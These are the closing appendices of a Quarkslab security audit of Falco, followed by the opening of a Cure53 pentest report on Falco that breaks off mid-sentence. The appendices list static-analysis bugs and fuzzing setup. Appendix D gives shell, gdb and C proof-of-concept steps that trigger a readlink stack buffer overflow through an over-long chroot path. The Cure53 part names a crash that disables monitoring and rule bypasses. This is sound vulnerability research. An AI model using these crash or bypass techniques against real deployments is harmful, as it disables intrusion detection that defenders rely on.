Sysdig blog. May 13,\n2019. url:https://sysdig.com/blog/cve-2019-8339-falco-vulnerability/\n(visited on Dec. 6, 2022) (cit. on p. 6).\n[12]Falco maintainers. GitHub Security Advisories . Falcohttps : / / github . com /\nfalcosecurity/falco/security/advisories and libs https://github.com/\nfalcosecurity/libs/security/advisories . (Visited on Dec. 6, 2022) (cit. on p. 6).\nRef: 23-01-1097-LIV 47 Quarkslab SASAppendix A\nSeverity Classification\nSeverity Description\nMedium Medium issues that cannot be directly exploited, such as buffer overflows that\ncould potentially lead to a crash, arbitrary read or arbitrary code execution by\nunprivileged users if exploitable in the future.\nLow Low issues that cannot be directly exploited, such as memory, resource leak or Null\npointer dereference that could lead to a crash of the program by unprivileged users.\nInfo Minor issues such as programming mistakes or the above issues happening in less\nimportant parts of the code, like debug or test code that makes it unreachable from\nunprivileged users.\nRef: 23-01-1097-LIV 48 Quarkslab SASAppendix B\nInfer report extracts\nThis is Infer’s partial report, errors not mentioned were removed from this extract, see the\ninfer-report.txt file for the complete version.\n#9\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/plugin/plugin_loader.c:73: error: Null Dereference\npointer `ret`last assigned on line 55 could be null and is dereferenced at line 73, column 5.\n71. }\n72. #else\n73. ret->handle = dlopen(path, RTLD_LAZY);\n^\n74. if (ret->handle == NULL)\n75. {\n#13\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/kmod/scap_kmod.c:67: error: Resource\nLeak ◁arrowhookleft→\nresource of type `_IO_FILE `acquired to `return `by call to `fopen() `at line 61, column 16 is not released after line 67, column 4.\n65. if(w == 0)\n66. {\n67. return 0;\n^\n68. }\n69.\n#15\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_gzfile.c:72:\nerror: Null Dereference ◁arrowhookleft→\npointer `h`last assigned on line 71 could be null and is dereferenced at line 72, column 5.\n70.\n71. reader_handle_t* h = (reader_handle_t *) malloc (sizeof (reader_handle_t));\n72. h->m_file = file;\n^\n73.\n74. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n#16\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_gzfile.c:75:\nerror: Null Dereference ◁arrowhookleft→\npointer `r`last assigned on line 74 could be null and is dereferenced at line 75, column 5.\n73.\n74. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n75. r->handle = h;\n^\n76. r->read = &gzfile_read;\n77. r->offset = &gzfile_offset;\n#17\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/filterchecks.cpp:80: error: Null\nDereference ◁arrowhookleft→\npointer `loc`last assigned on line 78 could be null and is dereferenced at line 80, column 8.\n78. loc = localtime(&t);\n79.\n80. dt = (loc->tm_hour - gmt->tm_hour) * 60 * 60 + (loc->tm_min - gmt->tm_min) * 60;\n^\n81.\n82. dir = loc->tm_year - gmt->tm_year;\n#24\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/logger.cpp:85: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `fopen() `at line 85, column 11 is not released after line 85, column 2.\n83. ASSERT(m_file == nullptr);\n84.\n85. m_file = fopen(filename.c_str(), \"w\");\n^\n86. if(!m_file)\n87. {\n#25\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/parsers.cpp:99: error: Null Dereference\npointer `evt_state->m_piscapevt `last assigned on line 97 could be null and is dereferenced at line 99, column 2.\n97. evt_state.m_piscapevt = (scap_evt*) realloc(evt_state.m_piscapevt, buf_size);\n98. evt_state.m_scap_buf_size = buf_size;\n99. evt_state.m_piscapevt->type = evt_type;\nRef: 23-01-1097-LIV 49 Quarkslab SAS^\n100. evt_state.m_metaevt.m_pevt = evt_state.m_piscapevt;\n101. }\n#28\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_buffered.c:132:\nerror: Null Dereference ◁arrowhookleft→\npointer `h`last assigned on line 131 could be null and is dereferenced at line 132, column 5.\n130.\n131. reader_handle_t* h = (reader_handle_t *) calloc (1, sizeof (reader_handle_t));\n132. h->m_close_reader = own_reader;\n^\n133. h->m_reader = reader;\n134. h->m_buffer = (uint8_t*) malloc (sizeof(uint8_t) * bufsize);\n#29\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_buffered.c:138:\nerror: Null Dereference ◁arrowhookleft→\npointer `r`last assigned on line 137 could be null and is dereferenced at line 138, column 5.\n136.\n137. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n138. r->handle = h;\n^\n139. r->read = &buffered_read;\n140. r->offset = &buffered_offset;\n#38\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/examples/test.cpp:237: error: Resource Leak\nresource acquired by call to `open() `at line 229, column 11 is not released after line 237, column 2.\n235. goto error;\n236.\n237. atexit(remove_module);\n^\n238.\n239. return true;\n#42\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/bpf/scap_bpf.c:351: error: Null\nDereference ◁arrowhookleft→\npointer `sym`last assigned on line 342 could be null and is dereferenced at line 351, column 6.\n349. }\n350.\n351. if(sym[*nr_maps].st_shndx != maps_shndx)\n^\n352. {\n353. continue;\n#43\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:544: error: Null Dereference\npointer `handle->m_dev_list->hh.tbl `last assigned on line 544 could be null and is dereferenced by call to `memset() `at line 544,\ncolumn 5. ◁arrowhookleft→\n542. mountinfo->mount_id = mount_id;\n543. mountinfo->dev = dev;\n544. HASH_ADD_INT64(handle->m_dev_list, mount_id, mountinfo);\n^\n545. if(uth_status != SCAP_SUCCESS)\n546. {\n#45\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:635: error: Null Dereference\npointer `zero `last assigned on line 634 could be null and is dereferenced by call to `memcmp() `at line 635, column 8.\n633. size_t sz = len - offset;\n634. void* zero = calloc(sz, sizeof(char));\n635. if(!memcmp(left, zero, sz))\n^\n636. {\n637. free(zero);\n#51\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:710: error: Null Dereference\npointer `*sockets_by_ns->hh.tbl `last assigned on line 710 could be null and is dereferenced by call to `memset() `at line 710,\ncolumn 4. ◁arrowhookleft→\n708. char fd_error[SCAP_LASTERR_SIZE];\n709.\n710. HASH_ADD_INT64(*sockets_by_ns, net_ns, sockets);\n^\n711. if(uth_status != SCAP_SUCCESS)\n712. {\n#52\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:706: error: Null Dereference\npointer `sockets `last assigned on line 705 could be null and is dereferenced at line 706, column 4.\n704. {\n705. sockets = malloc(sizeof(struct scap_ns_socket_list));\n706. sockets->net_ns = net_ns;\n^\n707. sockets->sockets = NULL;\n708. char fd_error[SCAP_LASTERR_SIZE];\nRef: 23-01-1097-LIV 50 Quarkslab SAS#53\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:876: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 876 could be null and is dereferenced by call to `memset() `at line 876, column 3.\n874. }\n875.\n876. HASH_ADD_INT64((*sockets), ino, fdinfo);\n^\n877. if(uth_status != SCAP_SUCCESS)\n878. {\n#54\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:792: error: Null Dereference\npointer `fdt`last assigned on line 790 could be null and is dereferenced at line 792, column 11.\n790. sinsp_fdtable* fdt = get_fd_table();\n791.\n792. for(it = fdt->m_table.begin(); it != fdt->m_table.end(); ++it)\n^\n793. {\n794. if(it->second.m_type == SCAP_FD_IPV4_SOCK)\n#56\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:819: error: Null Dereference\npointer `fdt`last assigned on line 817 could be null and is dereferenced at line 819, column 11.\n817. sinsp_fdtable* fdt = get_fd_table();\n818.\n819. for(it = fdt->m_table.begin();\n^\n820. it != fdt->m_table.end(); ++it)\n821. {\n#57\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:914: error: Null Dereference\npointer `newbuf `last assigned on line 913 could be null and is dereferenced by call to `memset() `at line 914, column 4.\n912. {\n913. void* newbuf = malloc(sizes->at(j));\n914. memset(newbuf, 0, sizes->at(j));\n^\n915. m_private_state.push_back(newbuf);\n916. }\n#59\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:985: error: Null Dereference\npointer `res`last assigned on line 984 could be null and is dereferenced at line 985, column 2.\n983. {\n984. scap_dumper_t* res = (scap_dumper_t*)malloc(sizeof(scap_dumper_t));\n985. res->m_f = gzfile;\n^\n986. res->m_type = DT_FILE;\n987. res->m_targetbuf = NULL;\n#60\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1064: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1042, column 8 is not released after line 1064, column 9.\n1062. }\n1063.\n1064. return scap_dump_open_gzfile(handle, f, fname, skip_proc_scan);\n^\n1065. }\n1066.\n#61\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1093: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1076, column 7 is not released after line 1093, column 9.\n1091. }\n1092.\n1093. return scap_dump_open_gzfile(handle, f, \"\", skip_proc_scan);\n^\n1094. }\n1095.\n#62\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1093: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1079, column 7 is not released after line 1093, column 9.\n1091. }\n1092.\n1093. return scap_dump_open_gzfile(handle, f, \"\", skip_proc_scan);\n^\n1094. }\n1095.\n#67\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1418: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1418 could be null and is dereferenced by call to `memset() `at line 1418, column 2.\n1416. int32_t uth_status = SCAP_SUCCESS;\n1417.\n1418. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1419. if(uth_status == SCAP_SUCCESS)\n1420. {\nRef: 23-01-1097-LIV 51 Quarkslab SAS#68\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1418: error: Null Dereference\npointer `handle->m_proclist.m_proclist->hh.tbl `last assigned on line 1418 could be null and is dereferenced by call to `memset() `\nat line 1418, column 2. ◁arrowhookleft→\n1416. int32_t uth_status = SCAP_SUCCESS;\n1417.\n1418. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1419. if(uth_status == SCAP_SUCCESS)\n1420. {\n#69\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:1482: error: Null\nDereference ◁arrowhookleft→\npointer `fdtable `last assigned on line 1474 could be null and is dereferenced at line 1482, column 15.\n1480. eparams.m_ts = m_inspector->m_lastevent_ts;\n1481.\n1482. for(fdit = fdtable->begin(); fdit != fdtable->end(); ++fdit)\n^\n1483. {\n1484. eparams.m_fd = fdit->first;\n#70\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1434: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1434 could be null and is dereferenced by call to `memset() `at line 1434, column 2.\n1432. int32_t uth_status = SCAP_SUCCESS;\n1433.\n1434. HASH_ADD_INT64(tinfo->fdlist, fd, fdinfo);\n^\n1435. if(uth_status == SCAP_SUCCESS)\n1436. {\n#71\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1434: error: Null Dereference\npointer `tinfo->fdlist->hh.tbl `last assigned on line 1434 could be null and is dereferenced by call to `memset() `at line 1434,\ncolumn 2. ◁arrowhookleft→\n1432. int32_t uth_status = SCAP_SUCCESS;\n1433.\n1434. HASH_ADD_INT64(tinfo->fdlist, fd, fdinfo);\n^\n1435. if(uth_status == SCAP_SUCCESS)\n1436. {\n#74\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1501: error: Null Dereference\npointer `stid `last assigned on line 1500 could be null and is dereferenced at line 1501, column 3.\n1499. {\n1500. stid = (scap_tid *) malloc(sizeof(scap_tid));\n1501. stid->tid = tid;\n^\n1502. int32_t uth_status = SCAP_SUCCESS;\n1503.\n#78\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1696: error: Resource Leak\nresource acquired by call to `opendir() `at line 1660, column 15 is not released after line 1696, column 9.\n1694. if((*procinfo_p)->n_entries == (*procinfo_p)->max_entries)\n1695. {\n1696. if(!scap_alloc_proclist_info(procinfo_p, (*procinfo_p)->n_entries + 256, lasterr))\n^\n1697. {\n1698. goto error;\n#79\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:1686: error: Null\nDereference ◁arrowhookleft→\npointer `proclist_dumper `last assigned on line 1640 could be null and is dereferenced by call to `scap_write_proclist_end() `at\nline 1686, column 5. ◁arrowhookleft→\n1684. });\n1685.\n1686. if(scap_write_proclist_end(m_inspector->m_h, dumper, proclist_dumper, totlen) != SCAP_SUCCESS)\n^\n1687. {\n1688. throw sinsp_exception(scap_getlasterr(m_inspector->m_h));\n#80\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap.c:1662: error: Null Dereference\npointer `handle->m_suppressed_comms `last assigned on line 1659 could be null and is dereferenced at line 1662, column 2.\n1660. handle->m_num_suppressed_comms * sizeof(char *));\n1661.\n1662. handle->m_suppressed_comms[handle->m_num_suppressed_comms-1] = strdup(comm);\n^\n1663.\n1664. return SCAP_SUCCESS;\n#87\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1812: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1812 could be null and is dereferenced by call to `memset() `at line 1812, column 4.\nRef: 23-01-1097-LIV 52 Quarkslab SAS1810. {\n1811. int32_t uth_status = SCAP_SUCCESS;\n1812. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1813. if(uth_status != SCAP_SUCCESS)\n1814. {\n#88\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1812: error: Null Dereference\npointer `handle->m_proclist.m_proclist->hh.tbl `last assigned on line 1812 could be null and is dereferenced by call to `memset() `\nat line 1812, column 4. ◁arrowhookleft→\n1810. {\n1811. int32_t uth_status = SCAP_SUCCESS;\n1812. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1813. if(uth_status != SCAP_SUCCESS)\n1814. {\nRef: 23-01-1097-LIV 53 Quarkslab SASAppendix C\nScan-Build experimentations\nFirst, Scan-Build was ran with no specific options like that, on the falco repository using the\nUSE_BUNDLED_DEPS=ON option:\nscan-build make -j 32\nIt found 595 bugs, all being on Falco’s third-party dependencies, none on Falco’s libs or direct\nsource code.\nIt was retried, adding more checkers with the following command:\nscan-build -enable-checker unix,nullability,core,cplusplus,security make -j 32\nThis scan found 2491 bugs, again all out of Falco’s scope.\nThis was a bit suspicious so we then realized that the analyze “fake compiler” of scan-build was\nonly used on the dependencies and not on Falco’s libs and source code, explaining why it was not\nfinding anything on this code.\nSo we tried to force the use of this “compiler” for the code using (the path is just copy-pasted\nfrom the Scan-Build lines of compilation, we could have simplify the ../):\ncmake -DUSE_BUNDLED_DEPS=ON\n-DCMAKE_C_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/ccc-analyzer\n-DCMAKE_CXX_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/c++-analyzer\n..◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nUnfortunately, it’s possible to run the analyzer like this but it will not generate the report, only\nthe warning during the compilation process. It would have been useful because we could have\ncompiled only the source code we are interested in with the static analyzer.\nHowever, Scan-Build has an --exclude flag, that could be used to exclude the source code of\ndependencies. We tried adding these flags:\nRef: 23-01-1097-LIV 54 Quarkslab SAS--exclude b64-prefix --exclude c-ares-prefix --exclude catch2-prefix --exclude\ncloudtrail-plugin-prefix --exclude cloudtrail-rules-prefix --exclude\ncpp-httplib-prefix --exclude curl-prefix --exclude cxxopts-prefix --exclude\nfakeit-prefix --exclude grpc-prefix --exclude jq-prefix --exclude\njson-plugin-prefix --exclude k8saudit-plugin-prefix --exclude\nk8saudit-rules-prefix --exclude njson-prefix --exclude openssl-prefix\n--exclude protobuf-prefix --exclude re2-prefix --exclude\nstring-view-lite-prefix --exclude tbb-prefix --exclude valijson-prefix\n--exclude yamlcpp-prefix --exclude zlib-prefix◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nRef: 23-01-1097-LIV 55 Quarkslab SASAppendix D\nExploiting and debugging readlink issues\nThe examples are quick scripts to exploit and debug and could be improved globally. For example,\nthe following one is a snippet on how to create a long root folder and chroot into it with a bash\nprocess.\nexport NEW_ROOT= $(python3 -c \"print( 'a'*200 + '/'+'a'*200 + '/'+'a'*200 + '/'\n+'a'*200+ '/'+'a'*200+ '/'+'a'*200)\" ) ◁arrowhookleft→\nmkdir -p $NEW_ROOT\nmkdir $NEW_ROOT/lib\nmkdir $NEW_ROOT/lib64\nmkdir $NEW_ROOT/bin\nsudo mount -B /lib $NEW_ROOT/lib\nsudo mount -B /lib64 $NEW_ROOT/lib64\nsudo mount -B /bin $NEW_ROOT/bin\nsudo chroot $NEW_ROOT /bin/bash\necho $$\n## NOTE; you will have to `sudo umount lib lib64 and bin `before `rm`the folders\nNote\nYou don’t need to be root to chroot, you can use usernamespace to gain that\nprivilege with unshare -r bash -c ’chroot root /folder’ .\nThen start Falco with GDB to see the issue in the program’s memory.\nsudo gdb ./userspace/falco/falco\nb scap_proc_fill_root\nr -c ../falco.yaml -r ../rules/falco_rules.yaml\n#`return SCAP_SUCCESS; `was on line 560 of the source\n# make sure to change the PID returned by the chrooted bash with echo $$\nbreak 560 ifstrcmp(procdirname, \"/proc/783385/\") == 0\nr -c ../falco.yaml -r ../rules/falco_rules.yaml\n# you can see that the structure with\np *tinfo\n# but still the last char on the string array is not \\0, it 's an 'a'\nprint tinfo->root[sizeof(tinfo->root)-1]\n# with the following command you can see the end of the string array on the\n# fourth line, and the rest of the element that starts on the lasts lines (some\n# values are at zero so we cannot distinguish them for alignments zeros)\nx/128x tinfo->root+1000\nThe following listing is a minimal example to reproduce the issue.\nRef: 23-01-1097-LIV 56 Quarkslab SAS#include <unistd.h>\n#include <stdio.h>\n#define SCAP_MAX_PATH_SIZE 10\ntypedef struct scap_threadinfo\n{\ncharroot[SCAP_MAX_PATH_SIZE + 1]\n} scap_threadinfo;\nstatic int scap_proc_fill_root( struct scap_threadinfo *tinfo, const char\n*procdirname) ◁arrowhookleft→\n{\nif(readlink(procdirname, tinfo->root, sizeof(tinfo->root)) > 0)\n{\nprintf(\"success: %s \\n\", tinfo->root);\nreturn0;\n}\nelse\n{\nprintf(\"fail \\n\");\nreturn-1;\n}\n}\nintmain()\n{\nscap_threadinfo tinfo;\nreturnscap_proc_fill_root(&tinfo, \"input\");\n}\nExecute like that, in the same folder:\ntouch aaaaaaaaaaaaaaaaaaaaaa\nln -s aaaaaaaaaaaaaaaaaaaaaa input\ncc test.c -fsanitize=address -o test\n./test\nYou will get an ASAN report for a stack buffer overflow in this situation.\nRef: 23-01-1097-LIV 57 Quarkslab SASAppendix E\nAFL++ persistent mode boilerplate\nOn top of the Listing 1, you will need to add this kind of code to do persistent mode fuzzing with\nAFL++:\n#include <unistd.h>\n__AFL_FUZZ_INIT();\nintmain()\n{\n#ifdef __AFL_HAVE_MANUAL_CONTROL\n__AFL_INIT();\n#endif\nunsigned char * buf = __AFL_FUZZ_TESTCASE_BUF;\nwhile(__AFL_LOOP(10000))\n{\nintlen = __AFL_FUZZ_TESTCASE_LEN;\nLLVMFuzzerTestOneInput(buf, len);\n}\nreturn0;\n}\nYou will then need to compile with the AFL++ instrumentation using, for example:\ncmake -DUSE_BUNDLED_DEPS=ON -DCMAKE_C_COMPILER=afl-gcc-fast\n-DCMAKE_CXX_COMPILER=afl-g++-fast .. ◁arrowhookleft→\nRef: 23-01-1097-LIV 58 Quarkslab SASAppendix F\nFuzzing with libprotobuf-mutator\nsyntax= \"proto3\";\npackage sys_open ;\nmessage event_args {\nuint64fd = 1;\nstringfspath = 2;\nrepeated FILE_FLAGS flags32 = 3;\nFILE_MODE mode = 4;\nuint32dev = 5;\nuint64ino = 6;\n}\nenumFILE_FLAGS {\nFUZZ_O_NONE = 0;\nFUZZ_O_RDONLY = 1;\nFUZZ_O_WRONLY = 2;\nFUZZ_O_RDWR = 3;\nFUZZ_O_CREAT = 4;\nFUZZ_O_APPEND = 8;\nFUZZ_O_DSYNC = 16;\nFUZZ_O_EXCL = 32;\nFUZZ_O_NONBLOCK = 64;\nFUZZ_O_SYNC = 128;\nFUZZ_O_TRUNC = 256;\nFUZZ_O_DIRECT = 512;\nFUZZ_O_DIRECTORY = 1024;\nFUZZ_O_LARGEFILE = 2048;\nFUZZ_O_CLOEXEC = 4096;\nFUZZ_O_TMPFILE = 8192;\n}\nenumFILE_MODE {\nFUZZ_S_NONE = 0;\nFUZZ_S_IXOTH = 1;\nFUZZ_S_IWOTH = 2;\nFUZZ_S_IROTH = 4;\nFUZZ_S_IXGRP = 8;\nFUZZ_S_IWGRP = 16;\nFUZZ_S_IRGRP = 32;\nFUZZ_S_IXUSR = 64;\nFUZZ_S_IWUSR = 128;\nFUZZ_S_IRUSR = 256;\nFUZZ_S_ISVTX = 512;\nRef: 23-01-1097-LIV 59 Quarkslab SASFUZZ_S_ISGID = 1024;\nFUZZ_S_ISUID = 2048;\n}\nRef: 23-01-1097-LIV 60 Quarkslab SAS" } ]
{ "category": "Provisioning", "file_name": "SECURITY_AUDIT_2019_07.pdf", "project_name": "Falco", "subcategory": "Security & Compliance" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report Falco 06.-07.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, MSc. D. Weißer, B. Walny,\nBSc. J. Hector, J. Larsson\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual code auditing\nPart 2. Code-assisted penetration testing\nIdentified Vulnerabilities\nFAL-01-001 Driver: Undetected crash disables Falco monitoring (Critical)\nFAL-01-002 Falco: Bypassing various rules with different techniques (High)\nFAL-01-003 Falco: HTTP request with incorrect data leads to crashes (High)\nMiscellaneous Issues\nFAL-01-004 Falco: Dependencies pulled via hard-coded HTTP links (Low)\nFAL-01-005 Falco: Security flags not enforced by Makefile (Low)\nConclusions\nIntroduction\n“Falco is a behavioral activity monitor designed to detect anomalous activity in your\napplications. Powered by sysdig’s system call capture infrastructure, Falco lets you\ncontinuously monitor and detect container, application, host, and network activity—all in\none place—from one source of data, with one set of rules.”\nFrom https://github.com/falcosecurity/falco\nThis report documents a large-scale security assessment of the Falco software complex.\nCarried out by Cure53 in June 2019, this project entailed both a thorough penetration\ntest and a broader, general security audit. Notably, the targeted Falco software is a\nbehavioral activity monitor designed to detect anomalous activity in deployed\napplications. Five security-relevant discoveries, including one item marked as “ Critical” in\nterms of severity, were made on the scope during this project.\nCure53, Berlin · 07/24/19 1/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIt should be clarified that this Cure53 project was very extensive and actually combined\ntwo parts of investigations against two items. The first component was an analysis of the\nFalco software described here, while the second encompassed the open-source version\nof the Sysdig software. The latter is documented in a separate report. The reasoning\nbehind this bifocal approach was that the two software items are very much\ninterconnected and Falco actually makes heavy use of Sysdig. In other words,\ncapitalizing on the available resources and executing the assessments against the two\nitems in parallel was a great opportunity for reaching a much more wide-spanning,\noptimal coverage. On that note, it needs to be stated that this assessment of the security\nlevels exhibited by Falco was requested and sponsored by CNCF, while the\ncomplementary audit and pentest against Sysdig software was financed by Sysdig, Inc.\nCommenting more on the particular resources dedicated to the project, a team of six\nmembers of the Cure53 team was comprised and tasked with completing this\nassessment. The tests and audits were carried out in June and July of 2019, with\neighteen days invested into work specific to Falco, and twenty person-days spent on\nresearch and tests that targeted Sysdig. Both components were realized in a timely\nfashion and progressed efficiently. Slack was used for communications during the test\nSlack. In a dedicated channel, the Cure53, Falco and Sysdig teams could collaborate\nand exchange information about emerging issues and findings.\nZooming in on the findings from the tests against Falco, it can be noted that three\nproblems were noted as actual vulnerabilities and two as general weaknesses. Among\nthe core flaws, one vulnerability received a “ Critical” score because it would make it\npossible for an attacker to deactivate Falco. As such, it would bypass the anomaly\ndetection by simply crashing the software. The issue is closely related to a crash found\nin Sysdig, which is documented in the corresponding report as SYS-01-003. Additionally\nof note is that two findings were deemed to carry “ High”-level risks. These indicate more\ndetection bypasses and another crash that can be triggered via HTTP. On a positive\nnote, all other issues should be seen as quite trivial severity. Further, none of the\ndiscoveries should be overly difficult to fix. As the rule bypasses are more worrisome\nand may pose some challenges, they will be discussed in the conclusion one more time.\nIn the following sections, this report will first shed light on the scope and then furnishes\ncase-by-case descriptions of the findings, featuring both technical details (i.e. with Proof-\nof-Concept excerpts) and possible mitigations for going forward. Based on the results of\nthis summer 2019 assessment, Cure53 issues a broader verdict about the privacy and\nsecurity posture of the tested items. Conclusions pertinent to the Falco software\ncomplex, its limitations and possible improvements that should be considered in future\nreleases, are supplied in the final section of the report.\nCure53, Berlin · 07/24/19 2/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n•Falco\n◦https://github.com/falcosecurity/falco/releases/tag/0.15.3 \n◦A Scope Doc was made available & shared between Cure53 and Sysdig, Inc.\nTest Methodology\nThe following paragraphs describe the testing methodology used during the audit of the\nFalco- and its dependent Sysdig-codebase. The test was divided into two phases, each\nfulfilling different goals. In the first phase, the focus was on manual source code reviews,\nwhich were needed for spotting insecure code patterns. Usually issues around race\nconditions, information leakage or similar flaws can be found in this context. During the\nsecond phase, it was evaluated whether the security goals and premise claimed by\nFalco can withstand real-life attack scenarios.\nPart 1. Manual code auditing\nThis section lists the steps that were undertaken during the first phase of the\nassessment targeting the Falco software compound. It describes the key aspects of the\nmanual code audit. Along with the spotted major issues, the list portrays the\nthoroughness of the audit and confirms the quality of the project.\n•The provided documentation was extensively studied to obtain a good overview\nof the project and its deployment options.\n•The puppet module was audited for problems in relation to the instrumentation of\nFalco. No issues were detected.\n•The parser-aspect of the user-space engine, along with the rule-loader, were\ntreated with extra scrutiny, yet no weaknesses were noted.\n•program_output was closely investigated but the pipe to the supplied executable\nby popen does not allow for cmdline injection.\n•The entire codebase was checked for C-style string functionality. While format\nstring potential was identified, none of it has been deemed exploitable.\n•The webserver implementation was investigated for typical problems, in\nparticular the handler-aspects. No exploitable scenarios were found.\n•Overall usage of functions akin to mg_send_http_error and mg_printf has been\naudited with no vulnerabilities spotted.\n•The entire codebase was checked for proper usage of format strings, especially\nthe application of substrings. No security-related issues were filed.\n•The C++ code was audited for language-typical misapplication like direct object\nreferences leading to use-after-free, as well as dangling c_str-pointers.\nCure53, Berlin · 07/24/19 3/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•The parts of the webserver dealing with JSON parsing were audited but none of\nthe typically found problems seem to weaken the codebase.\n•Memory management functions like malloc, realloc and memcpy were\ninvestigated for inappropriate application but found to be correct.\n•The dependency build-scripts were audited. The fact that HTTP links are used\nwith hard-coded version numbers resulted in the recommendation for FAL-01-\n004.\nPart 2. Code-assisted penetration testing\nThe following list documents the distinguishable steps taken during the second part of\nthe test. A code-assisted penetration test was executed against a locally deployed\nKubernetes-cluster configured by the testing team, running both Falco and Sysdig. This\nadditional approach was used to ensure maximum coverage of the originally defined\nattack surface.\n•Falco and Sysdig were installed in a remote Minikube-cluster, emulating a full\nKubernetes-cluster with helm, tiller and additional services.\n•A DVWA-pod was installed as a test service to evaluate the default ruleset\ndeployed by Falco in a potentially compromised environment.\n•The TLS/SSL setup inside the Kubernetes-cluster was checked for correct\nconfiguration. Session establishment and event retrieval were deemed secure.\n•Falco was deployed with a DaemonSet, optionally including RBAC. A resource\ndepletion problem within Minikube was identified.\n•Falco configuration options were verified, http_output uses curl with proper\nsettings; SSRF would not work even in a 